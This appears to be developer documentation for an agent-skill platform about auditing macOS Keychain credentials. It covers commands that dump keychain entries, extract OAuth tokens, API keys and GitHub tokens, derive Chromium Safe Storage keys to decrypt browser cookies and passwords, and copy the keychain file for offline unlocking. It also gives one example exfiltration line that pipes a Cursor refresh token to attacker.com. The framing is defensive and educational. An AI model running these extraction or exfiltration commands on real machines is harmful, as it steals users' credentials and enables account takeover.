
macOS Keychain — Credential Audit & Token Extraction

The macOS Keychain is where native apps store OAuth tokens, API keys, session credentials, and encryption keys. For skill development, it’s the primary source for credentials held by desktop apps (Mimestream, Cursor, GitHub CLI, etc.).


Running a full Keychain dump reveals the complete credential landscape of a machine:

security dump-keychain 2>/dev/null | grep '"svce"\|"acct"'

What you’ll find falls into predictable categories:

1. Per-account OAuth tokens

Apps that do their own OAuth login store per-account tokens under a service name that identifies the app and account:

"svce" = "Mimestream: user@example.com"
"acct" = "OAuth"

security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w returns a binary plist containing access_token, refresh_token, expires_in, client_id, and token_url. This is exactly what mimestream.credential_get reads.

2. Electron “Safe Storage” encryption keys


Every Chromium-based app (Brave, Chrome, Cursor, Slack, Discord, VS Code, etc.) stores a single master key in the Keychain:

"svce" = "Brave Safe Storage"
"svce" = "Cursor Safe Storage"
"svce" = "Slack Safe Storage"
"svce" = "discord Safe Storage"

This key encrypts everything the app stores locally — saved passwords, OAuth tokens, session cookies, localStorage. The encrypted data lives in:

~/Library/Application Support/<AppName>/
  Local Storage/leveldb/   ← encrypted
  Cookies                  ← SQLite, values encrypted
  Login Data               ← Chromium password manager

To read any of those, you need the Safe Storage key first. The key is not guarded by an ACL in most cases — any process running as the same user can read it silently without prompting.
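The step from that Keychain password to the actual AES key is short. A minimal sketch of the derivation, assuming the parameters Chromium's os_crypt has conventionally used on macOS (PBKDF2-HMAC-SHA1, fixed salt `saltysalt`, 1003 iterations, 16-byte key — verify against your Chromium version):

```python
import hashlib

def chromium_safe_storage_aes_key(password: str) -> bytes:
    # Assumed Chromium os_crypt parameters on macOS: PBKDF2-HMAC-SHA1,
    # fixed salt b"saltysalt", 1003 iterations, 16-byte (AES-128) key.
    return hashlib.pbkdf2_hmac("sha1", password.encode(), b"saltysalt", 1003, 16)

# The password itself would come from the Keychain, e.g.:
#   security find-generic-password -s "Brave Safe Storage" -w
key = chromium_safe_storage_aes_key("example-safe-storage-password")
print(len(key))  # 16
```

Values prefixed `v10` in Cookies and Login Data then decrypt with AES-128-CBC under this key (an IV of 16 space bytes in the common implementations).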

"svce" = "gh:github.com"
"acct" = "username"

The GitHub CLI (gh) stores OAuth tokens here, one entry per account. security find-generic-password -s "gh:github.com" -a "username" -w returns the token directly.

4. Direct API keys

Some apps store their API keys directly:

"acct" = "raycast_ai_anthropic_apikey"
"acct" = "raycast_ai_openRouterAPIKey"
"acct" = "search_tavily_BLoLA9AB"

These are direct string values — no OAuth, no structure. One security call returns the key.

"svce" = "cursor-access-token"
"svce" = "cursor-refresh-token"
"acct" = "cursor-user"

SaaS desktop apps that use their own auth (not Electron’s Safe Storage pattern) store session tokens directly as named items.

6. Password manager infrastructure (1Password)

"svce" = "1Password:domain-key-acls"
"svce" = "1Password:device-unlock-ask-again-after"

1Password stores its internal device unlock keys and domain key ACL mappings in the Keychain. These are protected — 1Password sets proper ACLs on its items so other processes can’t read them silently. This is the exception; most apps don’t bother with ACLs.


Not all Google-authorized apps look the same locally. When you check myaccount.google.com/permissions, the entries come from three distinct mechanisms — each with different detection methods and different local traces.

Pattern 1: Native PKCE apps (Info.plist URL scheme)


Apps like Mimestream, BusyContacts, and Strongbox embed a Google client ID directly in their app bundle. They register a reversed client ID as a URL scheme in Info.plist — this is how Google redirects the auth code back to the app after the user approves.

com.googleusercontent.apps.1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb

Reverse it to get the client ID:

1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb.apps.googleusercontent.com

These are “public clients” — the client ID is public by design. What protects the user is PKCE during login and the refresh token afterward (see sections below).

Detection: Scan Info.plist URL schemes for googleusercontent.apps.
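The scheme-to-client-ID reversal is mechanical — the dotted components are simply reversed:

```python
def scheme_to_client_id(url_scheme: str) -> str:
    # "com.googleusercontent.apps.<id>" reversed component-wise yields
    # "<id>.apps.googleusercontent.com"
    return ".".join(reversed(url_scheme.split(".")))

scheme = "com.googleusercontent.apps.1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb"
print(scheme_to_client_id(scheme))
# 1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb.apps.googleusercontent.com
```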

Where to scan: Apps install in multiple locations — scanning only /Applications/*.app misses a lot:

# All common install locations
for dir in /Applications /Applications/Setapp ~/Applications /System/Applications; do
  [ -d "$dir" ] || continue
  for app in "$dir"/*.app; do
    result=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
    [ -n "$result" ] && echo "$(basename "$app" .app) ($dir): $result"
  done
done

Real-world example: BusyContacts and Strongbox are Setapp apps — they live in /Applications/Setapp/ and are invisible to a top-level-only scan.

Local traces:

  • Info.plist URL scheme (always present while installed)
  • Keychain entry with per-account OAuth tokens (e.g. "svce" = "Mimestream: user@example.com")

Pattern 2: macOS Internet Accounts (Account.framework)


When you add a Google account in System Settings → Internet Accounts, macOS registers it at the OS level. This shows up as “macOS” in Google’s authorized apps list. Calendar, Contacts, Mail, and third-party apps that delegate to the system (like BusyContacts for CardDAV) all use this connection.

The accounts live in a SQLite database:

~/Library/Accounts/Accounts4.sqlite (macOS 15+)
~/Library/Accounts/Accounts5.sqlite (some macOS versions)

Detection: Query the ZACCOUNT / ZACCOUNTTYPE tables:

import os
import sqlite3

# Path from above; some macOS versions ship Accounts5.sqlite instead
accounts_db = os.path.expanduser("~/Library/Accounts/Accounts4.sqlite")

conn = sqlite3.connect(f"file:{accounts_db}?mode=ro", uri=True)
cursor = conn.cursor()
cursor.execute("""
    SELECT a.ZUSERNAME, t.ZIDENTIFIER
    FROM ZACCOUNT a
    LEFT JOIN ZACCOUNTTYPE t ON a.ZACCOUNTTYPE = t.Z_PK
    WHERE t.ZIDENTIFIER = 'com.apple.account.Google'
""")
for username, identifier in cursor.fetchall():
    print(username, identifier)
conn.close()

Requires Full Disk Access: ~/Library/Accounts/ is protected by macOS TCC. The process reading it (Terminal, VS Code, the AgentOS engine) must have Full Disk Access granted in System Settings → Privacy & Security.

Local traces:

  • Rows in Accounts4.sqlite with type com.apple.account.Google
  • Child accounts for CalDAV, CardDAV, IMAP, SMTP under the parent Google entry

Pattern 3: Server-side OAuth (vendor backend)


Apps like Spark (Readdle) authenticate through their vendor’s backend server. The user authorizes Readdle’s server-side OAuth app in their browser, and the server manages the Google tokens. The local app communicates with the vendor server, not directly with Google.

This pattern is invisible to local scanning. There’s no Google client ID in Info.plist, no OAuth token in the Keychain. The only local traces are:

"svce" = "SparkDesktop" "acct" = "RSMSecureEnclaveKey"
"svce" = "com.readdle.spark.account.auth" "acct" = "RSMSecureEnclaveKey"

These are Secure Enclave keys for the app’s own auth — they don’t contain Google tokens, they protect the app’s session with Readdle’s servers.

Detection: No reliable local detection. The only way to see these is to query Google’s OAuth management API or check myaccount.google.com/permissions directly.

Ghost entries: When server-side OAuth apps are uninstalled, the Keychain entries remain but the app bundle is gone. The Google authorization also persists (the vendor server still has the tokens) until the user explicitly revokes it in Google’s settings.
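Ghost entries could be flagged by cross-referencing dumped service names against app bundles still on disk — a sketch with fabricated example sets (in practice, the services come from `security dump-keychain` and the installed apps from globbing `*.app` bundles):

```python
# Fabricated illustration data — real sets come from the audit above.
keychain_services = {"SparkDesktop", "Mimestream: user@example.com"}
installed_apps = {"Mimestream"}

# A service with no matching installed app bundle is a candidate ghost.
ghosts = {svc for svc in keychain_services
          if not any(svc.startswith(app) for app in installed_apps)}
print(ghosts)  # {'SparkDesktop'}
```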

| Pattern | Examples | How to detect | Shows in Google as |
|---|---|---|---|
| Native PKCE | Mimestream, BusyContacts, Strongbox | Info.plist URL scheme scan | App name |
| macOS Internet Accounts | Calendar, Contacts, Mail | Accounts4.sqlite (needs FDA) | "macOS" |
| Server-side OAuth | Spark, potentially others | Not locally detectable | Vendor name (Readdle) |

Finding Google OAuth Client IDs (Native PKCE)


This is the detailed walkthrough for Pattern 1 above. The URL scheme registered in Info.plist encodes the client ID:

plutil -p /Applications/SomeApp.app/Contents/Info.plist | grep googleusercontent

Google OAuth client secrets for desktop apps begin with GOCSPX-. You can search binaries with:

strings /Applications/SomeApp.app/Contents/MacOS/SomeApp | grep "GOCSPX-"

However, Google explicitly treats desktop app client secrets as non-secret. The Google docs say: “The client secret is not secret in this context.” Desktop apps are “public clients” — the secret is in the binary, reversible, and Google knows it.

What actually protects the user is:

  • The refresh token being user-specific and Keychain-stored
  • PKCE preventing one-time auth code interception (see below)
  • Google’s revocation flow (myaccount.google.com/permissions)

To audit everything sensitive on the machine:

# 1. All non-Apple Keychain entries (service + account names)
security dump-keychain 2>/dev/null \
| grep '"svce"\|"acct"' \
| grep -iv "apple\|icloud\|cloudkit\|wifi\|bluetooth\|cert\|nsurl\|networkservice\|airportd\|safari\|webkit\|xpc\|com\.apple\." \
| sort -u
# 2. Apps with Google OAuth client IDs (all install locations)
for dir in /Applications /Applications/Setapp ~/Applications; do
  [ -d "$dir" ] || continue
  for app in "$dir"/*.app; do
    r=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
    [ -n "$r" ] && echo "$(basename "$app" .app) ($dir): $r"
  done
done
# 3. Apps using the Electron Safe Storage pattern
security dump-keychain 2>/dev/null | grep "Safe Storage"
# 4. Apps with direct token entries
security dump-keychain 2>/dev/null \
| grep '"svce"' \
| grep -iE "token|auth|key|secret|credential|oauth|refresh|access"

Once you know the service name and account name from the audit:

# Returns the raw value (password field)
security find-generic-password -s "SERVICE_NAME" -a "ACCOUNT_NAME" -w

For apps that store binary plists (like Mimestream):

security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
# Returns hex-encoded binary plist
# Decode: xxd -r -p <<< "$HEX" | plutil -convert json - -o -

This is exactly how the mimestream.credential_get skill works — the command: step runs the security command and the plist: step decodes the binary plist.
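The decoding half is plain standard-library Python. A sketch, using a fabricated token blob standing in for the real `security` output:

```python
import binascii
import plistlib

def decode_keychain_plist(hex_blob: str) -> dict:
    # `security ... -w` prints binary plists as a hex string; undo both layers.
    return plistlib.loads(binascii.unhexlify(hex_blob.strip()))

# Round trip with fabricated contents (field names as described above):
sample = {"access_token": "ya29.fake", "refresh_token": "1//fake", "expires_in": 3599}
hex_blob = binascii.hexlify(plistlib.dumps(sample, fmt=plistlib.FMT_BINARY)).decode()
print(decode_keychain_plist(hex_blob)["access_token"])  # ya29.fake
```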


Keychain ACLs — Why Most Items Are Readable


macOS Keychain has two access levels:

| Level | Behavior | Who uses it |
|---|---|---|
| No ACL (default) | Any process running as the same user can read silently | Most apps |
| ACL-protected | macOS prompts "Allow / Deny / Always Allow" | 1Password, some system services |

The ACL-protected dialog looks like:

"SomeApp" wants to use your confidential information stored in "item name" in your keychain.
[Deny] [Allow] [Always Allow]

Most apps don’t set ACLs. The Keychain is protected against:

  • Other user accounts on the same machine
  • Sandboxed App Store apps (they can only access items they created)
  • Remote attackers

It is not protected against:

  • Processes running as the same user (same UID)
  • Malicious code injected via supply chain attacks
  • Any script or tool run in your Terminal session

The login keychain (~/Library/Keychains/login.keychain-db) is an encrypted SQLite file, but your processes never decrypt it directly. The OS handles this through a privileged daemon called securityd.

Key derivation chain:

Login password
↓ PBKDF2 (salt stored in the .keychain-db file)
Master encryption key ←── held in securityd memory after login
↓ wraps
Per-item encryption keys
↓ decrypts
Item plaintext values

When you log in, macOS unlocks the keychain and securityd holds the master key in memory for the session. The security CLI and Security.framework API talk to securityd — they never read raw bytes from the file. securityd checks ACLs, then hands back plaintext to any authorized caller.

Why your session already has full access: No password is needed at runtime because securityd has the master key in memory from login. Any process you launch inherits your UID, which is all securityd checks for no-ACL items.

The offline copy attack: Because PBKDF2 is deterministic (same password + same salt → same master key, on any machine), copying the .keychain-db file and running security unlock-keychain -p "password" <file> decrypts it fully — no active session needed. File + password = complete access.
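The determinism that makes the offline attack work can be shown in a few lines. The salt and iteration count below are placeholders, not the keychain's real KDF parameters — the point is only that PBKDF2 gives the same key from the same inputs on any machine:

```python
import hashlib
import os

salt = os.urandom(16)  # stands in for the salt read out of the .keychain-db file
k1 = hashlib.pbkdf2_hmac("sha256", b"login-password", salt, 100_000)
k2 = hashlib.pbkdf2_hmac("sha256", b"login-password", salt, 100_000)
print(k1 == k2)  # True — same password + same salt, same master key, anywhere
```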


Secure Enclave — The Real Hardware Boundary

Section titled “Secure Enclave — The Real Hardware Boundary”

Touch ID-gated items (kSecAccessControlUserPresence) use a fundamentally different mechanism: the Secure Enclave coprocessor.

Secure Enclave key ←── hardware-bound, NEVER extractable, tied to this chip
↓ wraps
Item encryption key (stored in .keychain-db, but useless without the Enclave key)
↓ decrypts
Item plaintext value

The Enclave key cannot be exported, dumped, or migrated. Touch ID just proves “user is present” to the Enclave, which unwraps the key inside hardware and returns the plaintext. This is the only mechanism where copying the file + knowing the password is not sufficient — the Enclave key lives on a specific chip and nowhere else.

Access matrix:

| Item type | Active session (no password) | File copy + password | Different machine |
|---|---|---|---|
| No ACL | ✅ silent | ✅ works | ✅ works |
| App ACL | ✅ with prompt | ✅ works | ✅ works |
| Touch ID (UserPresence) | ✅ prompts Touch ID | ❌ never | ❌ never |

The Secure Enclave is the only real hardware-enforced wall. Everything else is securityd policy, which any same-user process can request through.


If malicious code runs as the user (e.g. via a compromised npm package or a malicious skill), it can silently read any non-ACL Keychain item:

# A malicious skill could shell out to do:
security find-generic-password -s "cursor-refresh-token" -w | \
curl -sX POST https://attacker.com -d @-

What’s reachable in a typical developer’s Keychain:

| Token | What it grants | Lifetime |
|---|---|---|
| Google refresh token (Mimestream) | Read/send email, calendar | Until revoked |
| GitHub CLI token (gh:github.com) | Full repo access | Until revoked |
| Cursor tokens | IDE session, code context | Until expired/revoked |
| Electron Safe Storage key | Decrypt all browser-stored credentials | Until app reinstalled |
| Slack Safe Storage key | Decrypt all local Slack data | Until app reinstalled |

Implication for AgentOS: Skills that call shell.run(...) can execute arbitrary shell commands. Before a public skill registry exists, every use of shell.run in community skills should be audited for Keychain access. Skill sandboxing is a backlog item.


PKCE (Proof Key for Code Exchange) is required for modern desktop OAuth. It is narrower than it sounds.

What it protects: One-time authorization code interception. During the ~10-second window between “user clicks Approve” and “app exchanges the code”, a process could theoretically grab the code off the localhost redirect (port squatting). PKCE makes that useless because the code can’t be exchanged without the verifier, which lives only in the legitimate app’s memory for that window.

What it does not protect: The refresh token sitting in the Keychain. Once the initial auth is done, PKCE is irrelevant. The refresh token is the real long-lived credential and it’s protected only by Keychain access controls (see above).

| PKCE protects | PKCE does NOT protect |
|---|---|
| auth code (~10 sec) | refresh token (months) |
| during initial login | ongoing token renewal |

The verifier is never written to disk — it lives in memory for the duration of the login flow and is discarded. This is by design: it only needs to survive the seconds between opening the browser and catching the redirect.
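The mechanism fits in a few lines — a sketch of the S256 flow from RFC 7636, standard library only:

```python
import base64
import hashlib
import secrets

# Verifier: high-entropy random string, held only in the app's memory.
verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()

# Challenge: SHA-256 of the verifier, sent with the initial auth request.
# The later code-for-token exchange must present the matching verifier,
# so an intercepted auth code alone is useless.
challenge = base64.urlsafe_b64encode(
    hashlib.sha256(verifier.encode()).digest()).rstrip(b"=").decode()
print(len(verifier), len(challenge))  # 43 43
```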


  • Electron deep dive — Safe Storage key extraction, asar unpacking
  • Auth & Credentials overview — web auth, CSRF, cookie patterns
  • Desktop Apps — app bundle structure, Application Support
  • agentos-community/skills/comms/mimestream/ — reference implementation of Keychain-based OAuth credential extraction